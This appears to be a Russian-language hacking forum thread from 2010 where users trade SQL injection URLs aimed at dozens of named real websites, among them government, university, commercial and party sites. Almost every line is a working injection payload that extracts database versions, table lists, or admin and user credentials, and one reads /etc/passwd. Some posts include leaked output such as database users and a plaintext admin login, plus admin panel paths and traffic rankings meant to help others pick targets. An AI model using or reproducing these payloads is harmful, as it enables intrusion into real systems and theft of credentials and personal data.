http://www.touringcartimes.com/news.php?id=4326'%20and%201=0%20union%20select%201 ,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,6 8,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84, 85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,1 01,102,103,104,105,106,107,108,109,110,111,112,113 ,114,115,116,117,118,119,120,121,122,123,124,125,1 26,127,128,129,130,131,132,133,134,135,136,137,138 ,139,140,141,142,143,144,145,146,147,148,149,150,1 51,152,153,154,155,156--%201
Сайт : _http://shop.blutronics.com
ТИЦ: 10
PR: 3
Code:
_http://shop.blutronics.com/ViewProdotti.asp?Id=-391+or+1=(select+top+1+cast(UserName+as+nvarchar)% 2B':'%2B+cast(Password+as+nvarchar)+from+AccUsers+ where+id_user=1)
_http://www.moph.gov.af/en/events.php?id=21+and+1=0+UnIoN/**/SeLeCt+1,2,3,group_concat(id,0x3a,uname,0x3a,passw ord,0x3a,email),5,6,7,8,9,10,11,12+from+registered _members
Ministry of Public Health Afghanistan
---------
http://www.iec.org.af/eng/content.php?id=4+or+(1,1)=(select+count(0),concat( (select+concat(username,char(58),hash_password)+fr om+users+limit+0,1),floor(rand(0)*2))from(informat ion_schema.tables)+group+by+2)--+
Independent Election Commission of Afghanistan
---------
http://www.nbaa.com.af/file.php?id=6+and+1=0+union+select+1,2,3,4,aes_dec rypt(aes_encrypt(group_concat(username,char(58),pa ssword),1),1),6+from+websiteadmin_admin_users
National Basketball Association of Afghanistan
---------
http://www.misfa.org.af/file.php?id=122+and+1=0+union+select+1,2,3,4,aes_d ecrypt(aes_encrypt(user_pwd,1),1),6+from+users+whe re+user_name=char(119,97,100,111,111,100)
Microfinance Investment Support Facility for Afghanistan
PR 4
195.8.80.50
blunt
5.0.77-log
unknown-linux-gnu
http://www.bluntlondon.com/work.php?id=201+and+1=0+%20Union%20Select%20%20CON CAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28 %29,version%28%29%29,2
---------------------------------------
PR 3
stratisa_stratis@localhost
stratisa_stratisdb
4.1.22-standard
pc-linux-gnu
http://www.stratisautosport.gr/en/products/car.php?id=43+and+1=0+UNION%20SELECT%201,CONCAT_WS %28CHAR%2832,58,32%29,user%28%29,database%28%29,ve rsion%28%29,@@version_compile_os%20%29,3,4,5
http://collections.glasgowmuseums.com/cld.html?cid=533619%20and%201=2%20union%20select%2 01,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17, 18,19,20 --
5.0.51b-community-nt
http://www.ries.com/iframes/articles-read.php?id=55'+and+1=0+union+select+1,2,3,4,5,6,g roup_concat(table_name),8+from+information_schema. tables+where+table_schema=database()+--+
ТИЦ : 30
http://www.4apes.com/science/read.php?id=613'+and+1=0+union+select+1,2,3,concat _ws(0x3a,id,loginname,password,email),5,6,7,8,9+fr om+phplist_admin+limit+0,1+--+
Code:
http://www.4apes.com/lists/admin/ - Админка проекта
ТИЦ : 10
http://www.greyhenpress.com/news.php?id=-4'%20union%20select%201,2,group_concat(table_name, 0x3a,table_rows),4,5,6%20from%20information_schema .tables--%201
http://www.montreuxjazz.com/news.php?id=-37%20union%20select%201,2,3,unhex(hex(table_name)) ,5,6,7,8,9,10,11,12,13,14%20from%20information_sch ema.tables%20limit%2017,1--%201
http://www.mba.ru/studentsworks.php?id=-6+union+select+1,2,concat_ws(0x3a,manager_name,adv _password),4,5,6+from+mbs.mbs_managers--
тиц 300 пр5
http://www.shareapic.net/content.php?gid=187428.8%27union%20select%201,2,gr oup_concat%280x3c62723e,login,0x3a3a,password,0x3a 3a,email,0x3a3a,usertype%29,4,5,6,7,8%20from%20sha reapic.users%20where%20login%20like%200x2561646d69 6e25--%20
мб кому интересно будет)
100к+ трафа)
http://www.thedailystar.net/latest/updates.php?pid=-1%0Aunion%0Aall%0Aselect%0A1,2,3,4,5/*
тож трафистое)...юзеров сами дернете если кому интересно
ДЕЛОВОЙ ВЕСТНИК
http://www.volgogradcci.ru/udv/index.php?loc=1&id=-135+and+1=2+union+select+concat_ws(0x3a,@@version, user(),database(),@@version_compile_os),2+--
5.0.19-log root@localhost udv pc-linux-gnu
http://www.wandatech.com/Products.php?pid=84+or+(select+count(*)from(select +1+union+select+2+union+select+3)x+group+by+concat (mid((select+concat_ws(0x3a,id,lastname,password)+ from+cc_members+limit+0,1),1,64),floor(rand(0)*2)) )
Какой-то шоп с зонтиками
вывод phpinfo() - http://www.wandatech.com/v.php
http://www.szczecinek.lasy.gov.pl/goscino/aktualnosci.php?numer=1347&id=41+UnIon+selECt+1,2,3,4,concat(Login,char(58),H aslo),6,7,8,9,10+from+UZYTKOWNICY+--+
Админка - administracja/login.php
Датинг?!
http://www.adultfyi.com/read.php?ID=999999+union+select+1,concat_ws(0x3a,v ersion(),user()%20,database(),@@version_compile_os ),3,4,5,6,7,8--
http://www.siberianbrides.com/show_anketa_lady.php?id=99999+union+select+concat_ ws(0x3a,version(),user()%20,database(),@@version_c ompile_os),2,3,4,5,6,7--
http://www.capitansilver.ru/?id=-4+union+select+1,2,concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19+--
4.0.27-log silver2@zvm13.host.ru silver2 pc-linux-gnu
http://www.capitansilver.ru/?id=-4+union+select+1,2,concat_ws(0x3a,login,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+use r+limit+0,1--
http://www.greennavigation.com/news/news_profile.php?id=-33+union+select+0,1,2,3,concat(username,0x3a,p ass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +login
PR 4
http://www.jitreshippables.com/news1.php?id=-5+union+select+1,concat(username,0x3a,p ass word,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+j os_users
PR 3
http://www.hopeevanmin.org/calendar/eventdisplay.php?id=-13%20union%20select%201,2,concat(username,0x3a,p ass word)%20from%20admin
PR 2
http://www.adoradoll.us/news_detail.php?ID=44+union+select+0,concat(UserNa me,0x3a,P ass Word),2,3,4,5,6,7,8,9,10,11+from+DownUser
PR 3
http://mycjonline.com/articlesdetails.php?id=-21%20%20union%20select%20concat(username,0x3a,p ass word),2,3%20from%20users
PR 3
http://www.lapine-fsbo.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(usernam e,0x3a,p ass word),1,1,1,1,1,1,2,2,2,2,2/**/from/*%20*/admin--
PR 2
http://nekar.gr/index.php?id=-1%20union%20select%200,concat(username,0x3a,p ass word,0x3a,email),2,0x65786569207369676f75726120736 f6261726f2070726f626c686d6120682053514c20746f75207 369746521,4,5,6,7,8,9,10,11%20from%20admins--
PR 4
http://www.discoveryland.cn/index.php?c=article&a=view&artid=104%20and%201=2%20union%20all%20select%201,2 ,3,concat(username,0x3a,password),5,6,7,8,9,10%20f rom%20dland_admin%20limit%200,1--
PR 5
http://www.citme.com.cn/news.php?id=-57+union+select+0,concat_ws(username,0x3a,password ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26+from+Tb_Admin
PR 5 Cy 10
http://toeic-vietnam.com/info/details.php?id=null%20union%20select%201,2,group_c oncat(username,0x3a,password),4,5,6,7%20from%20use rs
PR 4
http://www.futurape.com/vedi-news.php?id=7+AND+1=2+UNION+SELECT+1,2,group_conca t(Username,0x3a,Password),4,5,6,7,8,9+FROM+Utente
PR 3
http://www.shangproperties.com/news_archive.php?id=-6%20union%20select%201,%202,%203,%204,%205,6,%207, group_concat(Username,0x3a,Password),%209,%2010,%2 011,%2012,%2013,%2014+from+auth_user_md5--
PR 3
http://www.hiast.edu.vn/index.php?pg=tintuc&task=chitiet&p2=52&p3=-129+Union+Select+1,2,3,group_concat(username,0x3a, password,0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+bee_admin--&lang=en
PR 3
http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=-335+UNION+ALL+SELECT+1,2,3,4,5,group_concat(userna me,0x3a,password,0x3a,name,0x3a,email,0x3a,phone,0 x3a,status,0x3a,createdby,0x3a,created,0x3a,update d,0x3a,lastlogin),7,8,9+from+cms_users+--
PR 3
http://www.smkn2bukittinggi.com/detail.php?id=-3%20union%20select%201,group_concat(username,0x3a, password),3,4,5,6,7,8,9,10,11,12%20from%20user
PR 4
http://nkutr.nku.edu.tr/haberdetay.php?id=-1111'UNioN%20SeLeCt%201,GRouP_ConCaT(username,0x3a ,password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1%20from%20mmyo_users--+
PR 7 Cy 10
http://www.coursupreme.dz/index.php?p=affichedecision&id=-669%20union%20select%201,2,3,4,5,6,load_file('/etc/passwd'),8+from+mysql.user
Наглядный пример читалки файлов через скулю
PR 5
http://eyeworld.mobi/current-issue-article.php?id=5621%20and%20substring(version(),1, 1)=3
3-я ветка =\
http://www.cadtutor.mobi/links/includes/jump.php?id=2%20and%20ascii(lower(substring((selec t version()),1,1)))>1
http://www.ulbsibiu.ro/ro/stiri/news.php?print=true&news_id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, (SELECT%20concat(0x7e,0x27,Hex(cast(jos_users.pass word%20as%20char)),0x27,0x7e)%20FROM%20cat_sociolo gie.jos_users%20LIMIT%200,1)%20,28,29,30,31,32,33, 34,35,36,37,38--
PR 8 Cy 30
[Feldmarschall]
17.10.2010, 22:40
Diplomatic Academy of Vienna(Вена)
Code:
http://www.da-vienna.at/jart/prj3/diplomatische_akademie/main.jart?rel=en&reserve-mode=active&content-id=1268305958599&artikel_id=-4283+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,0x3a,0x3a,username,0x3a,0x3a,password,0x3a,0x3a,a nrede,0x3a,0x3a,realvname,0x3a,0x3a,realnname,0x3a ,0x3a,land,0x3a,0x3a,ort,0x3a,0x3a,plz,0x3a,0x3a,s trasse,0x3a,0x3a,email,0x3a,0x3a,gebdat,0x3a,0x3a, 0x3a),11,12,13,14,15,16,17+from+diplak.wuser_user--
PR — 7
-PRIVAT-
17.10.2010, 22:46
http://www.conbhaireangsd.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--
http://www.dialynne.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--
http://www.flamuna.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--
http://www.stormavon.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--
http://www.diptonia.co.uk/dogpage.php?dog_ID=-17/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,user_ID,username,password ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20FROM%2 0user--
http://www.asc-hq.org/asc/comm_details.php?gamer_id=-1287%20union%20select%201,2,3,4,5,6,7,group_concat %28column_name%29,9,0,1,2,3,4,5,6%20from%20informa tion_schema.columns%20where%20table_name=0x74696b6 95f7573657273--
http://www.baryakina.com/?razdel=lang&ln=-2%20union%20select%201,2,3--
http://www.anunt.md/rus/telecom/anunturi/mobile_view.php?id=1507%20union%20select%201,2,3,4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,version(),4,5 ,6,7,8,9,0,1,2,3--
http://baltictravelnews.com/modules/printer_view/print_view.php?pub_id=-58160%20union%20select%201,concat%28@i:=0x00,@o:=0 x0d0a,benchmark%28225,@o:=CONCAT%28@o,0x0d0a,%28SE LECT%20concat%28table_schema,0x2E,@i:=table_name%2 9%20FROM%20information_schema.tables%20WHERE%20tab le_name%3E@i%20order%20by%20table_name%20LIMIT%201 %29%29%29,@o%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,2,3,4,5,6,7&l=ee
http://www.nomachine.com/news-read.php?idnews=284-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16--
http://u-books.ru/index.php?book_id=8353-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--
http://europeanleague.ru/news.php?id=79-999.99%20union%20select%201,2,3,4,5,6,7,8,9,10--
http://jobs.genomecenter.ucdavis.edu/start_app.php?job_id=78 union select 1,2--
http://www.pro-estate.ru/showalla.html?agent_id=-58057%20or%201%20group%20by%20concat(version(),flo or(rand(0)*2))having%20min(0)%20or%201--%201
Вывод в Title
http://www.caiv.org/noticias.php?apartado=israel&mire_id=278%20or%201%20group%20by%20concat((select/**/regi_Password%20from%20registros%20limit%200,1),fl oor(rand(0)*2))having%20min(0)%20or%201--%201&seccion=Noticias%20de%20Israel
http://www.use.or.ug/copindex.php?cat=lstofallco&subcat=lstcodir&cop=84+and+1=0+union+select+1,2,3,version(),5,6,7, 8,9,10,11,12,13,14,15,16,17--
http://www.umi.ac.ug/courses2.php?course_id=73+or+1+group+by+concat((se lect+version()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))having+min(0)+or+1--
[Dark Green]
18.10.2010, 05:43
У меня дебют в данной теме Надеюсь буду хоть кому то полезен
filmworld.com.ua
admin:filmworldadmin
PR: 0 ТИЦ: 0
Database Version: 5.0.91-community-log
Database name: filmworl_film
User name: filmworl@localhost
OC type: unknown-linux-gnu
Code:
http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+unhex(hex(version()))--
Code:
http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+login+from+customer+l imit+0,1--
Code:
http://filmworld.com.ua/index.php?shop=yes&razd=%C2%EE%E5%ED%ED%FB%E5%20(mpeg)&rubr=%D4%E8%EB%FC%EC%FB%20(mpeg)&id=1030+and+1=0+union+select+password+from+custome r+limit+0,1--
vmo.rgub.ru
PR: 6 ТИЦ: 60
Database Version: 5.1.37-1ubuntu5.4
Database name: vmo_db01
User name: root@localhost
OC type: debian-linux-gnu
FILE_PRIV: Y
Magic quotes = off
Code:
http://vmo.rgub.ru/policy/article.php?id=214+and+1=0+union+select+1,unhex(he x(version())),3,4,5,6,7,8,9,10,11,12--
Code:
http://vmo.rgub.ru/policy/article.php?id=214+and+1=0+union+select+1,login,3, 4,5,6,password,8,9,10,11,12+from+users+limit+0,1--
mirpodarkov.in.ua
PR: 2 ТИЦ: 0
Database Version: 5.0.91
Database name: wildcat_mir
User name: wildcat@localhost
OC type: redhat-linux-gnu
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,unhex( hex(version())),11--
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,user_g roup,11+from+dle_users+limit+0,1--
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,passwo rd,11+from+dle_users+limit+0,1--
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,userna me,11+from+dle_users+limit+0,1--
Code:
http://mirpodarkov.in.ua/index.php?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,email, 11+from+dle_users+limit+0,1--
Code:
http://mirpodarkov.in.ua/admin.php
http://www.oxothik.ru/index.php?action=news&id=-99+union+all+select+1,concat_ws(0x3a,@@version,use r(),database(),@@version_compile_os),3,4,5,6,7--
5.0.26-lk-log ecliptru_tour@localhost ecliptru_tour pc-linux-gnu
http://www.blue-keeeber.com/index.php?mod=gallery&list=-219%20union%20select%201,2,3,concat%28user,0x3a,pa ssword,0x3a,file_priv%29,5,6,7,8+from+mysql.user--
PR 3
http://www.unet.edu.ve/unet2001/noticias.php?id=1947+AND+1=2+UNION+SELECT+0,concat %28user,0x3a,password%29,2+FROM+mysql.user--
PR 6 Cy10
http://www.internetprovsechny.cz/clanek.php?cid=-92+UNION+SELECT+concat%28user,0x3a,password,0x3a,F ile_Priv%29+from+mysql.user--
PR 5 Cy 10
http://bollystic.com/Bollywood/showMovie.php?id=-564%20union%20select%201,2,group_concat%28user,0x3 a,password,0x3a,File_Priv%29,4,5,6,7,8,9,10%20from %20mysql.user--
PR 2
http://www.aries.ro/index.php?lang_id=-1+AND+1=2+UNION+SELECT+group_concat%28user,0x3a,pa ssword,0x3a,File_Priv%29+FROM+mysql.user--
PR 5 Cy 10
http://www.aps.ai/newsstory.php?id=43+and+1=0%20Union%20Select+1,gro up_concat%28user,0x3a,password,0x3C62723E%29,3,4,5 ,6+from+mysql.user
PR 5
http://www.asidoregon.org/newsdetail.php?id=209+AND+1=2+UNION+SELECT+0,group _concat%28user,0x3a,password%29,2,3,4,5,6,7%20from %20tblUsers--
PR 4 Cy 10
Code:
http://ecommerce.diocese-kcsj.org/respectlife/view-page.php?Page_ID=-14+union+select+1,2,concat_ws(0x3a,version(),user( ),database(),@@version_compile_os),4,5,6,7--
Database Version: 5.0.77
Database name: 4575_diocese_kcsjorg
User name: 4575_user1282171@lnh-www1h.bluehalo.myregisteredsite.com
OC type: redhat-linux-gnu
http://www.dawnnet.org/resources-news.php?id=-170%20/*!union*/%20select%201,2,3,table_name,5,6,7,8,9,0,11,12%20f rom%20information_schema./*!tables*/%20limit%2028,1--%201
http://www.81femmes.org/uk/news.php?id=-121%20union%20select%20version(),2,3,4--%201
http://www.alekseykalugin.ru/index.php?togive=think_read&id=17+and+1=0+union+Select+concat_ws(0x3a,username ,user_password),2,3+from+akphpbb_users+limit+1,1+--+
ТИЦ : 230
http://oblmed.nsk.ru/inex1.php?action=read&id=861+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,concat_ws(0x3a,id,username,passwo rd),18,19,20,21,22,23,24,25+From+OblBol_users+limi t+0,1+--+&hr=cs_53
ТИЦ : 230
http://safes.ru/show_good.php?idtov=10066'+and+1=0+UnIon+%0A+selEC t+1,2,3,concat_ws(0x3a,username,PASSWORD),5,6,7,8, 9,10,11,12,13,14,15,16,17,18+from+admin+limit+0,1+--+
ТИЦ : 110
http://www.safeburg.ru/cgi-bin/news/view.cgi?news=92'+and+1=0+UnIon+selECt+1,concat_ws (0x3a,ID,USER,LOGIN,PSW),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from +user_access+--+
ТИЦ : 80 PR: 3
http://massage-kreslo.ru/show_good.php?idtov=1061'+and+1=0+UnIon+selECt+1,2 ,3,concat_ws(0x3a,username,password),5,6,7,8,9,10, 11,12,13,14,15,16,17+from+admin+--+
http://arpion.ru/show_good.php?idtov=22312'+and+1=0+UnIon+selECt+1, 2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +admin+--+
ТИЦ : 70
http://best-carmusic.ru/show_good.php?idtov=3696'+and+1=0+UnIon+selECt+1,2 ,3,concat_ws(0x3a,username,password),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20+from+admin+--+
ТИЦ : 10
http://77tv.ru/show_good.php?idtov=220201'+and+1=0+UnIon+%0A+selE Ct+1,2,3,concat_ws(0x3a,username,password),5,6,7,8 ,9,10,11,12,13,14,15,16,17+from+admin+--+
ТИЦ : 10 PR: 2
http://vremeninet.ru/show_good.php?idtov=1073'+and+1=0+UnIon+%0A+selECt +1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9 ,10,11,12,13,14+from+admin+--+
ТИЦ : 20
itsell.ru/show_good.php?idtov=1101051'+and+1=0+UnIon+selECt+ 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19+from+admin+--+
ТИЦ : 20
----------------------------------------------
Ну а все начелось опять с корявых разроботчиков сайтов ))
http://www.bornet.ru/kl.php , кто хочет поковыряйте . там более 200 бажных сайтов
http://www.visitnacogdoches.org/news.php?id=-198' union select 1,table_schema,table_name,table_rows,0x3c68723e,6, 0x3c68723e,8 from information_schema.tables where table_rows>0-- 1
http://www.ummaclinic.org/news.php?id=-21' /*!union*/ select /*!concat*/(table_name),2,3,4,5,6,7,8,9 /*!from*/ information_schema.`tables` limit 38,1-- 1
Dr..VATSON
19.10.2010, 03:19
Code:
http://www.lisenok.ru/look.php?id=-99999+union+select+1,2,3,concat_ws%280x3a,login,pa ssword,access_level%29,5+from+users--
Тиц 60
http://www.lisenok.ru/login.php
http://www.sultanbrunei.com/news_read.asp?id=0x3a+union+select+0,concat%28user %28%29,0x3a,database%28%29,0x3a,version%28%29%29,2 ,3,4,5,6,7,8--
PR 3
http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,concat%28u ser,0x3a,password%29,4,concat%28user,0x3a,password %29,concat%28user,0x3a,password%29+FROM+mysql.user--
PR 5
http://www.habibrafiq.com/services.php?id=-22+union+select+0,1,concat%28user,0x3a,pass%29,3,4 ,5+from+admin
PR 3
http://cooksnotebook.com/show.php?id=-999+union+select+1,2,3,concat%28user%28%29,0x3a,ve rsion%28%29,0x3a,database%28%29%29,5,6,7,8--
PR 3
http://www.ceelqaboobe.com/view.php?id=-3561%20union%20select%201,2,3,4,5,concat%28user%28 %29%29,7,8,9,10--
PR 4
http://www.saladillo.gov.ar/informe_prensa_detalle.php?id=322+union+select+0,1 ,2,3,4,5,6,7,concat_ws%28user,0x3a,pass%29,9,10,11 +from+admin
P.S. Этот сайт выкладывали в PHP-inj, вот теперь скуля...
PR 4
http://www.rodonorte.pt/news.php?id=20+and+0=1+union+all+select+0x31,0x32, 0x33,unhex%28hex%28concat%28user%28%29,0x3a,versio n%28%29%29%29%29,0x35,0x36--
PR 6 Cy 10
http://clips.abusora.com/Clip.php?item_id=-25164%20union%20all%20select%201,2,concat%28user%2 8%29,0x3e,version%28%29,0x3e,database%28%29%29,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18--
PR 3
http://www.pc-boost.com/logitheque.php?idCat=11+and+0=1+union+all+select+c oncat%28user%28%29,database%28%29%29
P.S. Выводится белым цветом, поэтому либо выделите всю страницу, либо ищите в коде...
PR 4 CY 10
http://www.intema.gov.ar/curriculum.php?id=-109+union+select+1,2,3,4,5,concat%28user,0x3a,pass %29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25+from+login--
PR 4
http://www.sparkle.ir/products/category.php?id=9+union+select+1,2,concat%28user%2 8%29,version%28%29,database%28%29%29,4,5,6,7,8,9,1 0,11,12,13,14,15
PR 3
http://www.denhelder.nl/index.php?menu_id=60&nieuws_id=-3792+union+all+select+1,2,concat_ws%28user%28%29,0 x3a,database%28%29,0x3a%29,4,5,6,7,8,9,10,11--
PR 5 Cy 10
http://www.toxis.dk/8.0/news.php?id=40' union select 1,2,group_concat(table_name,0x3a,table_rows),4,5,6 ,7,8 from information_schema.tables-- 1
http://www.mesquitelocalnews.com/news.php?id=12)) or 1 group by concat((select table_name from information_schema.tables limit 17,1),floor(rand(0)*2))having min(0) or 1-- 1
http://www.melonfire.com/community/columns/trog/article.php?id=-280 /*!union*/ select 1,2,table_name,4,5,6 from information_schema.`tables`-- 1
http://www.shalomhills.com/eventdisplay.php?id=-999+union+select+version(),2,3--
http://www.milsetasia.org/milset/showstatic.php?id=4+and+1=0+union+select+version() ,2,3,4,5,6,7&lang=ar
http://www.artsadmin.co.uk/opportunities/bursary.php?id=1 or 1 group by concat((select version()),floor(rand(0)*2))having min(0) or 1-- 1
http://www.usauctionsonline.com/propertydetail.php?id=719 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,table_name, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100, 101,102,103,104,105,106,107,108,109,110,111,112 from information_schema.tables limit 28,1--
http://www.akella.com/gameclub/rating.php?id=-227+union+select+1,2,3,4,concat%28login,0x3a,pass% 29,6+from+users+--+
PR 5 Cy 1700
Серьезная вроде фирма, а такая дырка...
http://www.fortemall.com/auction_details.php?auction_id=964+and+row(0,0)in( select+count(@@wait_timeout),concat((select/**/concat(0x5b,user,0x5d,0x2d,0x5b,password,0x5d)/*{file_priv:Y}*/from+mysql.user+limit+1),char(58),floor(rand(0)*2) )as+z+from+information_schema.tables+group+by+z)
5.0.91-community
http://www.radiotec.ru/novosti.php?NWS=-2+UNION+SELECT+1,group_concat%28table_name%29,3,4+ from+information_schema.tables+where+table_schema! =0x696e666f726d6174696f6e5f736368656d61
http://www.global.duke.edu/admin/map/details.php?id=64' union select @@version-- 1
http://forumartgallery.com/admin/view_artistdet.php?id=193' and 1=0 union select 1,concat(admin_name,0x3a,admin_pwd),3,4,5,6 from admin-- 1
JetMotoService.Ru
http://jetmotoservice.ru/index.php?id_link=-182+and+1=2+union+select+1,2,3,concat(@@version,0x 20,user(),0x20,database(),0x20,@@version_compile_o s),5,6,7,8,9+--
5.0.32-Debian_7etch6-log u168307_2@localhost u168307_3 pc-linux-gnu
http://jetmotoservice.ru/index.php?id_link=-182+and+1=2+union+select+1,2,3,concat(user_login,0 x20,user_pass),5,6,7,8,9+from+msk_users+--
-PRIVAT-
21.10.2010, 15:51
http://www.geog.utah.edu/faculty/index.html?id=-1%20union%20select%201,2,3,4,concat_ws(0x3a,id,use rname,password),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20from%20users--
http://evergladesfoundation.biz/article.php?id=14%20or%201%20group%20by%20concat%2 8version%28%29,floor%28rand%280%29*2%29%29having%2 0min%280%29%20or%201--%201
http://www.dhana.biz/articles/article.php?id=25375%20or%201%20group%20by%20conca t%28version%28%29,floor%28rand%280%29*2%29%29havin g%20min%280%29%20or%201--%201&act=print
http://www.witec.biz/en/company/witecnews/news.php?id=50%20or%201%20group%20by%20concat%28ve rsion%28%29,floor%28rand%280%29*2%29%29having%20mi n%280%29%20or%201--%201
http://ukrinfo.biz/downloads/download.php?id=-7%20union%20select%201,2,3,4,5,6,7,8,9,0,1--
http://www.youngfuture.biz/podcast/news/index.php?news_id=-60%20union%20select%201,2,concat%28@i:=0x00,@o:=0x 0d0a,benchmark%28181,@o:=CONCAT%28@o,0x0d0a,%28SEL ECT%20concat%28table_schema,0x2E,@i:=table_name%29 %20FROM%20information_schema.tables%20WHERE%20tabl e_name%3E@i%20order%20by%20table_name%20LIMIT%201% 29%29%29,@o%29,4,5,6,7,8,9--
http://www.cadtutor.biz/corner/article.php?id=315 union select 1,version(),2,3,4,5,6--
http://airways.exbabylon.net/channels.html?article_id=186 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3--&channel_id=36
http://www.saltmag.net/display.php?article_id=240 union select 1,2,version(),4,5,6,7,8,9--
http://www.healthychild.net/SafetyFirst.php?article_id=179%20or%201%20group%20 by%20concat%28version%28%29,floor%28rand%280%29*2% 29%29having%20min%280%29%20or%201--%201
http://allrite.net/web/article.php?article_id=-90%20union%20select%20concat_ws%280x3a,mail,pass%2 9,2,3,4,5,6,7%20from%20users--
http://www.jazzhouse.org/gone/lastpost2.php3?edit=-1139276241+union+select+1,2,concat%28username,0x3a ,password,0x3a,id%29,4,5,6,7+from+ftp.ftp--
PR 6 Cy 30
КОММУНИСТИЧЕСКАЯ ПАРТИЯ РОССИЙСКОЙ ФЕДЕРАЦИИ
http://www.kprforel.ru/?news_id=1552&menuid=2+union+select+1,concat_ws(char(58),@@versi on,user(),database(),@@version_compile_os),3,4,5,6 +--+
4.0.26-log Uwww4945S@localhost udb4945 portbld-freebsd4.10
